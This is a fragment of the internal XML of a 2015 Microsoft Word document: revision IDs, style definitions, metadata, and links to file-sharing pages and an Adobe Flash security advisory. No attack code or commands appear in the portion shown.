          <w:t>http://vdisk.weibo.com/s/BY9EvewxqT4D_/1435050804</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00857AF9" w:rsidRDefault="00857AF9" w:rsidP="00653A00"/>
    <w:p w:rsidR="00857AF9" w:rsidRPr="00653A00" w:rsidRDefault="00857AF9" w:rsidP="00653A00"/>
    <w:sectPr w:rsidR="00857AF9" w:rsidRPr="0065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D9"/>
    <w:rsid w:val="00001DF5"/>
    <w:rsid w:val="00016053"/>
    <w:rsid w:val="00020F01"/>
    <w:rsid w:val="00023067"/>
    <w:rsid w:val="00056795"/>
    <w:rsid w:val="00060AE1"/>
    <w:rsid w:val="00071B97"/>
    <w:rsid w:val="0008639C"/>
    <w:rsid w:val="00093719"/>
    <w:rsid w:val="00094149"/>
    <w:rsid w:val="000A6CB8"/>
    <w:rsid w:val="000C090E"/>
    <w:rsid w:val="000C6771"/>
    <w:rsid w:val="000E2EC2"/>
    <w:rsid w:val="000F798A"/>
    <w:rsid w:val="001051EB"/>
    <w:rsid w:val="00127592"/>
    <w:rsid w:val="00134D8C"/>
    <w:rsid w:val="00142D32"/>
    <w:rsid w:val="00144047"/>
    <w:rsid w:val="0015073C"/>
    <w:rsid w:val="00161E4A"/>
    <w:rsid w:val="00173CD6"/>
    <w:rsid w:val="001807C8"/>
    <w:rsid w:val="001955F8"/>
    <w:rsid w:val="00195C71"/>
    <w:rsid w:val="001B2107"/>
    <w:rsid w:val="001B4739"/>
    <w:rsid w:val="001B6358"/>
    <w:rsid w:val="001B75AA"/>
    <w:rsid w:val="001D1AE5"/>
    <w:rsid w:val="001F271F"/>
    <w:rsid w:val="001F6342"/>
    <w:rsid w:val="00205D4E"/>
    <w:rsid w:val="002116BD"/>
    <w:rsid w:val="00216CB7"/>
    <w:rsid w:val="0022600C"/>
    <w:rsid w:val="00227B7E"/>
    <w:rsid w:val="002349B3"/>
    <w:rsid w:val="00240211"/>
    <w:rsid w:val="00253567"/>
    <w:rsid w:val="002656D5"/>
    <w:rsid w:val="00271BFB"/>
    <w:rsid w:val="0028226E"/>
    <w:rsid w:val="00287C5D"/>
    <w:rsid w:val="002908DD"/>
    <w:rsid w:val="002B0D30"/>
    <w:rsid w:val="002C2E6A"/>
    <w:rsid w:val="002C6DE1"/>
    <w:rsid w:val="002D6733"/>
    <w:rsid w:val="002E0724"/>
    <w:rsid w:val="002E4651"/>
    <w:rsid w:val="002F1175"/>
    <w:rsid w:val="002F4B2A"/>
    <w:rsid w:val="002F4BD9"/>
    <w:rsid w:val="002F5763"/>
    <w:rsid w:val="00300ECF"/>
    <w:rsid w:val="003066E8"/>
    <w:rsid w:val="003109F0"/>
    <w:rsid w:val="00315D2B"/>
    <w:rsid w:val="00331035"/>
    <w:rsid w:val="00340965"/>
    <w:rsid w:val="00350D13"/>
    <w:rsid w:val="00357451"/>
    <w:rsid w:val="00360A97"/>
    <w:rsid w:val="0036524B"/>
    <w:rsid w:val="00366135"/>
    <w:rsid w:val="00372846"/>
    <w:rsid w:val="00373354"/>
    <w:rsid w:val="0037733B"/>
    <w:rsid w:val="00380824"/>
    <w:rsid w:val="00380A0A"/>
    <w:rsid w:val="003844A1"/>
    <w:rsid w:val="003A0B1C"/>
    <w:rsid w:val="003B3307"/>
    <w:rsid w:val="003D1216"/>
    <w:rsid w:val="003D527F"/>
    <w:rsid w:val="003D58D8"/>
    <w:rsid w:val="003F468C"/>
    <w:rsid w:val="003F5CC0"/>
    <w:rsid w:val="004136AC"/>
    <w:rsid w:val="004222ED"/>
    <w:rsid w:val="00423B7E"/>
    <w:rsid w:val="00423E87"/>
    <w:rsid w:val="00426087"/>
    <w:rsid w:val="004445BC"/>
    <w:rsid w:val="00445A5E"/>
    <w:rsid w:val="00457DBD"/>
    <w:rsid w:val="00474956"/>
    <w:rsid w:val="0048000D"/>
    <w:rsid w:val="00496391"/>
    <w:rsid w:val="004A6233"/>
    <w:rsid w:val="004B24F0"/>
    <w:rsid w:val="004C3FB9"/>
    <w:rsid w:val="004D4134"/>
    <w:rsid w:val="004E45F2"/>
    <w:rsid w:val="004F346A"/>
    <w:rsid w:val="004F35D7"/>
    <w:rsid w:val="004F7783"/>
    <w:rsid w:val="00506FD9"/>
    <w:rsid w:val="005163D2"/>
    <w:rsid w:val="00523ACE"/>
    <w:rsid w:val="00525EA3"/>
    <w:rsid w:val="00536E19"/>
    <w:rsid w:val="00554F47"/>
    <w:rsid w:val="00557991"/>
    <w:rsid w:val="00563AE4"/>
    <w:rsid w:val="00584367"/>
    <w:rsid w:val="005A3E76"/>
    <w:rsid w:val="005A5673"/>
    <w:rsid w:val="005C50A1"/>
    <w:rsid w:val="005D1B10"/>
    <w:rsid w:val="005D616F"/>
    <w:rsid w:val="005E3D9D"/>
    <w:rsid w:val="005F7173"/>
    <w:rsid w:val="00614C06"/>
    <w:rsid w:val="0061732C"/>
    <w:rsid w:val="00622D46"/>
    <w:rsid w:val="00623C9F"/>
    <w:rsid w:val="00633D0B"/>
    <w:rsid w:val="0063750F"/>
    <w:rsid w:val="00642F25"/>
    <w:rsid w:val="0064384D"/>
    <w:rsid w:val="00646973"/>
    <w:rsid w:val="00653A00"/>
    <w:rsid w:val="00673A5B"/>
    <w:rsid w:val="00686D36"/>
    <w:rsid w:val="006A4FAC"/>
    <w:rsid w:val="006B2963"/>
    <w:rsid w:val="006C61E5"/>
    <w:rsid w:val="006D10CC"/>
    <w:rsid w:val="006F2ADC"/>
    <w:rsid w:val="00701CCE"/>
    <w:rsid w:val="00702226"/>
    <w:rsid w:val="0070275D"/>
    <w:rsid w:val="007057EB"/>
    <w:rsid w:val="0070605C"/>
    <w:rsid w:val="00706601"/>
    <w:rsid w:val="00711F5B"/>
    <w:rsid w:val="00715226"/>
    <w:rsid w:val="007226BD"/>
    <w:rsid w:val="00740E45"/>
    <w:rsid w:val="0074622C"/>
    <w:rsid w:val="00750FCC"/>
    <w:rsid w:val="00753855"/>
    <w:rsid w:val="0075603E"/>
    <w:rsid w:val="00762350"/>
    <w:rsid w:val="00775DA7"/>
    <w:rsid w:val="00790FF4"/>
    <w:rsid w:val="007959E3"/>
    <w:rsid w:val="007A53BF"/>
    <w:rsid w:val="007B361F"/>
    <w:rsid w:val="007C6406"/>
    <w:rsid w:val="007E461F"/>
    <w:rsid w:val="007F6ACC"/>
    <w:rsid w:val="007F7DBC"/>
    <w:rsid w:val="00813D3B"/>
    <w:rsid w:val="00820073"/>
    <w:rsid w:val="00824CC9"/>
    <w:rsid w:val="0084321B"/>
    <w:rsid w:val="00857AF9"/>
    <w:rsid w:val="00860E67"/>
    <w:rsid w:val="00866BDE"/>
    <w:rsid w:val="008728DE"/>
    <w:rsid w:val="00872949"/>
    <w:rsid w:val="00875FC8"/>
    <w:rsid w:val="008851B0"/>
    <w:rsid w:val="008864DD"/>
    <w:rsid w:val="008868D3"/>
    <w:rsid w:val="008A74C0"/>
    <w:rsid w:val="008B1FEF"/>
    <w:rsid w:val="008C1C4C"/>
    <w:rsid w:val="008C5A13"/>
    <w:rsid w:val="008C5B43"/>
    <w:rsid w:val="008D23F8"/>
    <w:rsid w:val="008E4719"/>
    <w:rsid w:val="008F2ECA"/>
    <w:rsid w:val="00901DE7"/>
    <w:rsid w:val="009052EA"/>
    <w:rsid w:val="00915CDC"/>
    <w:rsid w:val="00927389"/>
    <w:rsid w:val="00935020"/>
    <w:rsid w:val="009478D9"/>
    <w:rsid w:val="00962E03"/>
    <w:rsid w:val="0097586C"/>
    <w:rsid w:val="00982F61"/>
    <w:rsid w:val="0099205E"/>
    <w:rsid w:val="009A08E7"/>
    <w:rsid w:val="009A7BC9"/>
    <w:rsid w:val="009B2F97"/>
    <w:rsid w:val="009C2658"/>
    <w:rsid w:val="009C27B5"/>
    <w:rsid w:val="009D01B3"/>
    <w:rsid w:val="009F0E47"/>
    <w:rsid w:val="009F1787"/>
    <w:rsid w:val="00A05433"/>
    <w:rsid w:val="00A17B4E"/>
    <w:rsid w:val="00A2143C"/>
    <w:rsid w:val="00A34246"/>
    <w:rsid w:val="00A42093"/>
    <w:rsid w:val="00A516BE"/>
    <w:rsid w:val="00A51B5D"/>
    <w:rsid w:val="00A602EB"/>
    <w:rsid w:val="00A84CF7"/>
    <w:rsid w:val="00A8508D"/>
    <w:rsid w:val="00A9562F"/>
    <w:rsid w:val="00A97D33"/>
    <w:rsid w:val="00AA1695"/>
    <w:rsid w:val="00AA237A"/>
    <w:rsid w:val="00AB08C2"/>
    <w:rsid w:val="00AB3299"/>
    <w:rsid w:val="00AB3304"/>
    <w:rsid w:val="00AB561A"/>
    <w:rsid w:val="00AC625F"/>
    <w:rsid w:val="00AD1D34"/>
    <w:rsid w:val="00AD6A55"/>
    <w:rsid w:val="00AD7E56"/>
    <w:rsid w:val="00AE40CD"/>
    <w:rsid w:val="00B37140"/>
    <w:rsid w:val="00B41FB3"/>
    <w:rsid w:val="00B46699"/>
    <w:rsid w:val="00B5145E"/>
    <w:rsid w:val="00B7062C"/>
    <w:rsid w:val="00B83992"/>
    <w:rsid w:val="00B8606B"/>
    <w:rsid w:val="00B944EA"/>
    <w:rsid w:val="00BA5AD8"/>
    <w:rsid w:val="00BB485F"/>
    <w:rsid w:val="00BD0E32"/>
    <w:rsid w:val="00BD1CBB"/>
    <w:rsid w:val="00BD5234"/>
    <w:rsid w:val="00BD6E5E"/>
    <w:rsid w:val="00BD7832"/>
    <w:rsid w:val="00BE5AB2"/>
    <w:rsid w:val="00BF219C"/>
    <w:rsid w:val="00BF3F7A"/>
    <w:rsid w:val="00BF51D5"/>
    <w:rsid w:val="00BF574E"/>
    <w:rsid w:val="00C07A76"/>
    <w:rsid w:val="00C11C32"/>
    <w:rsid w:val="00C24A91"/>
    <w:rsid w:val="00C30050"/>
    <w:rsid w:val="00C41696"/>
    <w:rsid w:val="00C466D0"/>
    <w:rsid w:val="00C528BA"/>
    <w:rsid w:val="00C53D56"/>
    <w:rsid w:val="00C74BAD"/>
    <w:rsid w:val="00C77C57"/>
    <w:rsid w:val="00C813B7"/>
    <w:rsid w:val="00C84F22"/>
    <w:rsid w:val="00CA7678"/>
    <w:rsid w:val="00CB3B23"/>
    <w:rsid w:val="00CB5158"/>
    <w:rsid w:val="00CB69A0"/>
    <w:rsid w:val="00CC2CC2"/>
    <w:rsid w:val="00CC5AAD"/>
    <w:rsid w:val="00CD0BF0"/>
    <w:rsid w:val="00CD1D2C"/>
    <w:rsid w:val="00CD3B64"/>
    <w:rsid w:val="00CE6934"/>
    <w:rsid w:val="00CF26EF"/>
    <w:rsid w:val="00CF41E4"/>
    <w:rsid w:val="00CF6466"/>
    <w:rsid w:val="00D00ABC"/>
    <w:rsid w:val="00D03DDE"/>
    <w:rsid w:val="00D13255"/>
    <w:rsid w:val="00D25969"/>
    <w:rsid w:val="00D31485"/>
    <w:rsid w:val="00D31FAE"/>
    <w:rsid w:val="00D32B44"/>
    <w:rsid w:val="00D56920"/>
    <w:rsid w:val="00D61576"/>
    <w:rsid w:val="00D63152"/>
    <w:rsid w:val="00D71EFD"/>
    <w:rsid w:val="00D76163"/>
    <w:rsid w:val="00DB77F1"/>
    <w:rsid w:val="00DC1E92"/>
    <w:rsid w:val="00DD401A"/>
    <w:rsid w:val="00DE1527"/>
    <w:rsid w:val="00E04C94"/>
    <w:rsid w:val="00E0688D"/>
    <w:rsid w:val="00E11AB5"/>
    <w:rsid w:val="00E151D7"/>
    <w:rsid w:val="00E33C77"/>
    <w:rsid w:val="00E51DD0"/>
    <w:rsid w:val="00E740B6"/>
    <w:rsid w:val="00E81EF7"/>
    <w:rsid w:val="00E90B0E"/>
    <w:rsid w:val="00E913B5"/>
    <w:rsid w:val="00EA412D"/>
    <w:rsid w:val="00EC087E"/>
    <w:rsid w:val="00EE4A19"/>
    <w:rsid w:val="00F15E30"/>
    <w:rsid w:val="00F25A84"/>
    <w:rsid w:val="00F27468"/>
    <w:rsid w:val="00F3410D"/>
    <w:rsid w:val="00F35223"/>
    <w:rsid w:val="00F40195"/>
    <w:rsid w:val="00F7303B"/>
    <w:rsid w:val="00F73A06"/>
    <w:rsid w:val="00F97C89"/>
    <w:rsid w:val="00FB0DA6"/>
    <w:rsid w:val="00FB7A5E"/>
    <w:rsid w:val="00FE0F2F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2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52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2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352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52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52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7C640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03DDE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53A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3A00"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="username">
    <w:name w:val="username"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A84CF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A84CF7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AB56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2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52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2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352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52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52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7C640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03DDE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53A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3A00"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="username">
    <w:name w:val="username"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A84CF7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00A84CF7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AB56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disk.weibo.com/s/uAGaNxKsgN8na/142078839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b-chao.com/index.php/Index/show_detail/Sha1/E695FBEB87CB4F02917E574DABB5EC32D1D8F78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lpx.adobe.com/security/products/flash-player/apsa15-04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vdisk.weibo.com/s/BY9EvewxqT4D_/14350508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79BB-DBF3-4F2F-B1EB-16B9884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4</Pages>
  <Words>5574</Words>
  <Characters>31773</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>264</Lines>
  <Paragraphs>74</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>ALIBABA</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3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云翔</dc:creator>
  <cp:lastModifiedBy>王云翔</cp:lastModifiedBy>
  <cp:revision>326</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-07-11T05:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-07-12T04:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>